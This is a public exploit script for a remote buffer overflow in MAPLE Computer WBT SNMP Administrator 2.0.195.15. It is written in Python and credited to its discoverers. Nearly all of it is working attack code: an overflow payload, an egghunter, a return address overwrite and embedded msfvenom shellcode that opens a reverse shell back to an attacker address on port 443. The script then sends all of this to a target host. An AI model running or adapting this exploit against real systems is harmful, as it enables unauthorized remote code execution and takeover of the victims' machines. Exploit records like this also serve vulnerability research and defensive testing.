Share
# Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)  
# Author: sasaga92  
# Discovery Date: 2019-07-18  
# Vendor Homepage: www.computerlab.com  
# Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager  
# Software Link: ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE  
# Tested on OS: Windows XP SP2 x86  
# CVE: N/A  
# [+] Credits: John Page (aka hyp3rlinx)   
  
  
#!/usr/bin/python  
  
import sys  
import socket  
import random  
import string  
import struct  
  
  
  
def pattern_create(_type,_length):  
_type = _type.split(" ")  
  
if _type[0] == "trash":  
return _type[1] * _length  
elif _type[0] == "random":  
return ''.join(random.choice(string.lowercase) for i in range(_length))  
elif _type[0] == "pattern":  
_pattern = ''  
_parts = ['A', 'a', '0']  
while len(_pattern) != _length:  
_pattern += _parts[len(_pattern) % 3]  
if len(_pattern) % 3 == 0:  
_parts[2] = chr(ord(_parts[2]) + 1)  
if _parts[2] > '9':  
_parts[2] = '0'  
_parts[1] = chr(ord(_parts[1]) + 1)  
if _parts[1] > 'z':  
_parts[1] = 'a'  
_parts[0] = chr(ord(_parts[0]) + 1)  
if _parts[0] > 'Z':  
_parts[0] = 'A'  
return _pattern  
else:  
return "Not Found"  
  
def pwned(_host, _port, _payload):  
print "[*] Conectandose a {0}:{1}...".format(_host, _port)  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((_host, _port))  
print "[*] Conectado, Enviando payload {0} bytes...".format(len(_payload))  
_payload = "{0}\r\n\r\n".format(_payload)  
s.send(_payload)  
_data = s.recv(1024)  
s.shutdown  
s.close  
print 'Recibido:', repr(_data)  
print "[+] Payload de {0} bytes Enviado, Satisfactoriamente su payload ejecutado.".format(len(_payload))  
  
  
def main():  
  
_host = "192.168.0.12"  
_port = 987  
_offset_eip = 642200  
_padding = 642144  
_eip = "\xc3\x78\xd7\x5a" #call ebx 0x5AD778C3  
_tag = "w00tw00t"  
  
#msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.11 LPORT=443 -e x86/alpha_mixed -f c  
_shellcode = ("\x89\xe6\xda\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"  
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"  
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"  
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"  
"\x39\x6c\x39\x78\x6c\x42\x53\x30\x73\x30\x35\x50\x35\x30\x4d"  
"\x59\x78\x65\x30\x31\x4b\x70\x51\x74\x6e\x6b\x36\x30\x54\x70"  
"\x4e\x6b\x33\x62\x74\x4c\x4e\x6b\x30\x52\x52\x34\x4c\x4b\x44"  
"\x32\x45\x78\x46\x6f\x6c\x77\x33\x7a\x31\x36\x64\x71\x6b\x4f"  
"\x6e\x4c\x65\x6c\x30\x61\x73\x4c\x74\x42\x46\x4c\x67\x50\x59"  
"\x51\x68\x4f\x36\x6d\x76\x61\x7a\x67\x59\x72\x4c\x32\x51\x42"  
"\x32\x77\x4e\x6b\x33\x62\x36\x70\x6e\x6b\x52\x6a\x47\x4c\x4e"  
"\x6b\x42\x6c\x76\x71\x61\x68\x5a\x43\x52\x68\x33\x31\x58\x51"  
"\x63\x61\x6c\x4b\x52\x79\x45\x70\x57\x71\x79\x43\x4c\x4b\x53"  
"\x79\x62\x38\x4b\x53\x44\x7a\x37\x39\x4c\x4b\x66\x54\x4c\x4b"  
"\x47\x71\x38\x56\x76\x51\x49\x6f\x6e\x4c\x7a\x61\x78\x4f\x34"  
"\x4d\x76\x61\x5a\x67\x56\x58\x79\x70\x33\x45\x49\x66\x66\x63"  
"\x51\x6d\x69\x68\x65\x6b\x73\x4d\x66\x44\x64\x35\x5a\x44\x50"  
"\x58\x4e\x6b\x30\x58\x37\x54\x47\x71\x59\x43\x63\x56\x6e\x6b"  
"\x44\x4c\x50\x4b\x4c\x4b\x46\x38\x75\x4c\x43\x31\x69\x43\x4e"  
"\x6b\x44\x44\x6c\x4b\x45\x51\x38\x50\x4d\x59\x57\x34\x36\x44"  
"\x51\x34\x51\x4b\x53\x6b\x33\x51\x71\x49\x53\x6a\x76\x31\x6b"  
"\x4f\x69\x70\x61\x4f\x63\x6f\x53\x6a\x6e\x6b\x62\x32\x58\x6b"  
"\x6e\x6d\x61\x4d\x75\x38\x55\x63\x37\x42\x53\x30\x77\x70\x52"  
"\x48\x54\x37\x74\x33\x57\x42\x71\x4f\x32\x74\x50\x68\x62\x6c"  
"\x51\x67\x36\x46\x56\x67\x6e\x69\x59\x78\x6b\x4f\x4e\x30\x6e"  
"\x58\x4e\x70\x73\x31\x55\x50\x53\x30\x56\x49\x48\x44\x53\x64"  
"\x66\x30\x45\x38\x76\x49\x6f\x70\x32\x4b\x33\x30\x79\x6f\x4e"  
"\x35\x43\x5a\x57\x7a\x31\x78\x6b\x70\x4f\x58\x75\x50\x76\x6b"  
"\x33\x58\x75\x52\x65\x50\x43\x31\x6d\x6b\x6c\x49\x48\x66\x72"  
"\x70\x76\x30\x76\x30\x66\x30\x43\x70\x46\x30\x61\x50\x72\x70"  
"\x32\x48\x6b\x5a\x56\x6f\x69\x4f\x4b\x50\x69\x6f\x48\x55\x7a"  
"\x37\x43\x5a\x56\x70\x31\x46\x36\x37\x43\x58\x6e\x79\x6e\x45"  
"\x42\x54\x51\x71\x4b\x4f\x39\x45\x4e\x65\x4b\x70\x43\x44\x46"  
"\x6a\x39\x6f\x70\x4e\x45\x58\x50\x75\x38\x6c\x49\x78\x33\x57"  
"\x35\x50\x35\x50\x73\x30\x32\x4a\x45\x50\x71\x7a\x64\x44\x31"  
"\x46\x50\x57\x42\x48\x64\x42\x78\x59\x4a\x68\x73\x6f\x49\x6f"  
"\x49\x45\x4d\x53\x48\x78\x73\x30\x71\x6e\x77\x46\x6e\x6b\x75"  
"\x66\x73\x5a\x57\x30\x73\x58\x67\x70\x34\x50\x47\x70\x47\x70"  
"\x46\x36\x70\x6a\x37\x70\x50\x68\x51\x48\x69\x34\x76\x33\x78"  
"\x65\x39\x6f\x79\x45\x5a\x33\x76\x33\x51\x7a\x55\x50\x66\x36"  
"\x71\x43\x52\x77\x31\x78\x56\x62\x78\x59\x6f\x38\x53\x6f\x49"  
"\x6f\x79\x45\x4e\x63\x58\x78\x45\x50\x71\x6d\x64\x68\x70\x58"  
"\x61\x78\x33\x30\x51\x50\x43\x30\x47\x70\x53\x5a\x53\x30\x70"  
"\x50\x51\x78\x64\x4b\x36\x4f\x44\x4f\x50\x30\x69\x6f\x58\x55"  
"\x31\x47\x31\x78\x54\x35\x52\x4e\x62\x6d\x35\x31\x49\x6f\x7a"  
"\x75\x31\x4e\x51\x4e\x4b\x4f\x64\x4c\x46\x44\x76\x6f\x6e\x65"  
"\x54\x30\x59\x6f\x79\x6f\x4b\x4f\x6b\x59\x4f\x6b\x69\x6f\x79"  
"\x6f\x39\x6f\x37\x71\x48\x43\x51\x39\x4f\x36\x74\x35\x6f\x31"  
"\x58\x43\x4f\x4b\x78\x70\x58\x35\x6e\x42\x43\x66\x70\x6a\x37"  
"\x70\x73\x63\x69\x6f\x59\x45\x41\x41")  
  
_egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")  
  
_inject = pattern_create("trash A", _padding-len(_tag)-len(_shellcode))  
_inject += _tag  
_inject += _shellcode  
_inject += _egghunter  
_inject += pattern_create("trash B", _offset_eip-len(_inject))  
_inject += _eip  
  
print(_inject)  
pwned(_host,_port,_inject)  
  
if __name__ == "__main__":  
main()